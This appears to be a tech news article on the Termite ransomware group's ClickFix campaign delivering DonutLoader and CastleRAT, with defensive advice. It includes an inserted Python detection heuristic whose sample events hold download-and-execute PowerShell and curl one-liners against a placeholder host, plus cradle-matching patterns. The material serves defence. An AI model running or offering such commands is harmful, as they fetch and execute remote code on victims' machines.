
Termite Ransomware Gang Deploys CastleRAT Backdoor Through ClickFix Social Engineering Attacks

⚡ Quick Summary

  • Termite ransomware group uses ClickFix social engineering to deploy CastleRAT backdoor
  • Attack abuses legitimate Windows utilities to evade traditional security detection
  • New CastleRAT malware provides persistent access for network reconnaissance and lateral movement
  • Organizations need behavioral detection capabilities and ClickFix-specific employee training

What Happened

Security researchers have linked the Termite ransomware group, tracked by Microsoft as Velvet Tempest, to a new campaign that uses the ClickFix social engineering technique combined with legitimate Windows utilities to deploy the DonutLoader malware and the previously unseen CastleRAT backdoor. The campaign represents a significant evolution in ransomware deployment tactics, blending social engineering with living-off-the-land techniques to evade detection.

The attack chain begins with ClickFix-style social engineering that tricks users into executing malicious PowerShell commands, often disguised as solutions to fake error messages or software updates. Once executed, the commands abuse legitimate Windows utilities to download and install the DonutLoader, which in turn deploys the CastleRAT backdoor. CastleRAT provides persistent access to compromised systems, enabling the attackers to conduct reconnaissance, move laterally through networks, and ultimately deploy Termite ransomware.

The use of legitimate Windows utilities in the attack chain is particularly concerning because it allows the malware to bypass many security tools that focus on detecting known malicious executables. By leveraging trusted system tools, the attackers can operate within the normal noise of system activity, making detection significantly more difficult.

Background and Context

The Termite ransomware group has been active since mid-2024, initially operating as a relatively unsophisticated operation that relied on commodity malware and phishing campaigns. The adoption of ClickFix techniques and the development of CastleRAT suggest that the group has either significantly upgraded its capabilities or merged with a more technically advanced operation.

ClickFix has emerged as one of the most effective social engineering techniques in the current threat landscape. Originally identified in early 2025, the technique exploits users' willingness to follow troubleshooting instructions displayed in pop-up dialogs or web pages. Users are instructed to open a command prompt or PowerShell window and paste specific commands to resolve a supposed issue, unknowingly executing malicious code.

Living-off-the-land techniques, where attackers abuse legitimate system tools to achieve malicious objectives, have become a hallmark of sophisticated ransomware operations. By using tools like PowerShell, WMIC, and other Windows utilities that are present on every Windows installation, attackers can operate without deploying easily detectable malware executables.

Why This Matters

The convergence of social engineering innovation and technical sophistication in the Termite campaign represents a concerning trend in ransomware evolution. As security tools become better at detecting traditional malware, threat actors are adapting by minimizing their use of detectable malicious code and maximizing their abuse of legitimate system capabilities.

For organizations, this means that traditional signature-based security tools are increasingly insufficient for ransomware defense. Detection must evolve to focus on behavioral analysis, identifying suspicious patterns of legitimate tool usage rather than scanning for known malware signatures. Companies running their operations on Microsoft Office and Windows environments need security solutions that can detect anomalous PowerShell usage and unusual system tool invocations.

The human element remains the critical vulnerability. Despite years of security awareness training, the ClickFix technique continues to successfully manipulate users because it presents malicious actions as helpful troubleshooting steps. The psychological manipulation is effective because it targets a moment of frustration when a user encounters an apparent error, making them more likely to follow instructions without careful evaluation.

Industry Impact

The endpoint detection and response (EDR) market is being pushed to innovate by attacks like the Termite campaign. Vendors must develop more sophisticated behavioral detection capabilities that can distinguish between legitimate and malicious uses of system tools. This is a challenging technical problem because the same tools are used for both administration and attack.

The managed detection and response (MDR) market benefits from increasing attack complexity. As threats become harder for automated tools to detect, organizations turn to MDR providers that combine AI-powered detection with human analyst expertise. The Termite campaign illustrates why this combination is necessary: automated tools may miss the attack, but experienced analysts can recognize the behavioral patterns.

Cyber insurance underwriters are adjusting their risk models to account for evolving ransomware tactics. The effectiveness of ClickFix-based attacks suggests that organizations with strong technical controls but weak user security training may still face significant ransomware risk, influencing how insurers evaluate and price policies.

Businesses across all sectors using enterprise productivity software environments should treat ransomware defense as a multi-layered challenge that requires technological controls, user training, backup strategies, and incident response planning working together.

Expert Perspective

Threat intelligence analysts note that the Termite group's rapid capability evolution is consistent with a broader trend of ransomware ecosystem maturation. Groups are increasingly sharing tools, techniques, and infrastructure, enabling even relatively new operations to deploy sophisticated attack chains. The development of CastleRAT suggests access to skilled malware developers, either in-house or through the ransomware-as-a-service ecosystem.

Incident response professionals recommend that organizations focus on reducing the time between compromise and detection. The Termite attack chain includes multiple stages, each of which presents an opportunity for detection. Organizations with robust monitoring and rapid response capabilities can potentially stop the attack before ransomware is deployed, even if the initial ClickFix social engineering succeeds.

What This Means for Businesses

Security teams should immediately update their detection rules to look for indicators associated with the Termite campaign, including specific PowerShell command patterns, DonutLoader artifacts, and CastleRAT network indicators. Threat intelligence sharing through ISACs and industry groups can help organizations stay ahead of evolving attack techniques.
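The behavioral detection this section calls for, as an added example that is not from the article or any vendor: a Python heuristic over constructed Sysmon-style process-creation records that flags script hosts launched interactively from explorer.exe (where a pasted Run-box command lands) whose arguments look like a download-and-execute one-liner. The field names, sample command lines and pattern list are assumptions for illustration, not indicators from the Termite campaign.

```python
import re

# Constructed sample process-creation events in the shape of Sysmon Event ID 1
# fields (constructed for this example; not indicators from the article).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -ep bypass -c "iwr http://example.invalid/x | iex"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c curl -s http://example.invalid/a -o %TEMP%\a.exe && %TEMP%\a.exe"},
    {"ParentImage": r"C:\Program Files\ConfigMgr\ccmexec.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -File C:\scripts\inventory.ps1"},
]

# Script hosts a user can paste a command into, and parents that mean a human
# launched it (the Run box and the desktop are children of explorer.exe).
SHELL_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
USER_PARENTS = {"explorer.exe"}
# Argument fragments typical of download-and-execute one-liners (defender heuristics).
CRADLE_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"\biwr\b|invoke-webrequest|downloadstring|downloadfile|\bcurl\b|\bbitsadmin\b",
    r"\biex\b|invoke-expression",
    r"-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}",   # base64-encoded command
    r"-w(indowstyle)?\s+hidden",
    r"-ep\s+bypass|-executionpolicy\s+bypass",
    r"https?://",
)]

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def score_event(ev: dict) -> tuple[bool, list[str]]:
    """Return (suspicious, reasons) for one process-creation event."""
    image, parent = basename(ev["Image"]), basename(ev["ParentImage"])
    if image not in SHELL_HOSTS:
        return False, []
    reasons = []
    if parent in USER_PARENTS:
        reasons.append(f"{image} launched interactively by {parent}")
    for pat in CRADLE_PATTERNS:
        m = pat.search(ev["CommandLine"])
        if m:
            reasons.append(f"command line contains {m.group(0)!r}")
    # Require an interactive parent plus at least one cradle indicator; admin scripts
    # run by management agents or the scheduler have a different parent and pass.
    suspicious = parent in USER_PARENTS and len(reasons) >= 2
    return suspicious, reasons

def flag_events(events: list[dict]) -> list[dict]:
    return [ev for ev in events if score_event(ev)[0]]
```

The same rule expressed as a Sigma or EDR query would key on the same three fields: parent image, image, and command line.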

Employee security awareness training should specifically address the ClickFix technique. Users need to understand that legitimate software and operating systems never require them to manually paste commands into a terminal to resolve errors. Any prompt requesting this action should be treated as a potential attack.

Looking Ahead

The Termite campaign's combination of social engineering and living-off-the-land techniques will likely be adopted by additional ransomware groups as the approach proves effective. Security vendors will need to develop more sophisticated behavioral analysis capabilities, while organizations must invest in both technical controls and human-focused defenses to address this evolving threat landscape effectively.

Frequently Asked Questions

What is the ClickFix social engineering technique?

ClickFix tricks users into executing malicious commands by presenting them as troubleshooting steps for fake error messages. Users are instructed to open a terminal and paste commands, unknowingly installing malware on their systems.

What is CastleRAT?

CastleRAT is a previously unseen backdoor deployed by the Termite ransomware group that provides persistent access to compromised systems, enabling reconnaissance, lateral movement, and ultimately ransomware deployment.

How can organizations defend against ClickFix attacks?

Organizations should deploy behavioral detection tools that monitor for suspicious PowerShell usage, train employees to recognize that legitimate software never requires manual command pasting to fix errors, and implement endpoint monitoring that can detect living-off-the-land attack techniques.

Tags: Ransomware, Cybersecurity, ClickFix, Malware, Threat Intelligence
OfficeandWin Tech Desk
Covering enterprise software, AI, cybersecurity, and productivity technology. Independent analysis for IT professionals and technology enthusiasts.